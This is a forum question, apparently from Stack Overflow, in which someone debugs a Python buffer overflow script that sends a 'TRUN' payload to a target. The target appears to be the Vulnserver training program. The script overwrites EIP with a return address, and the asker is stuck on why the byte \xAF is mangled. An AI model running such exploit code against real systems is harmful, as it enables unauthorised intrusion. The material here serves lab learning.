# Hex escape in Python for Buffer Overflow works with numbers but not letters

Tags: python, sockets, buffer-overflow

I'm attempting to do a buffer overflow and have the following script in Python that attacks the target machine.

```
import socket

buffer = "A" * 2003 + '\xAF\x11\x50\x62'

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('ip', port))
    s.recv(1024)
    s.send('TRUN /.:/' + buffer)
    s.close()
except:
    print "Connection failed"
```

My problem is when I am trying to overwrite the EIP, if I enter in the memory address that includes letters (AF), the EIP changes completely. In little Endian I need the EIP to be `625011AF`. When I plug `'\xAF\x11\x50\x62'` into my buffer string my EIP is written as `00BFFF6F`. However, if I replace the af in the string to a number like `'x09\x11\x50\x62'` my EIP is overwritten to `62501109` as I'm expecting. I'm not sure and I can't figure out why the `\xaf` is throwing the whole EIP number off when overwritten. Any thoughts would be greatly appreciated.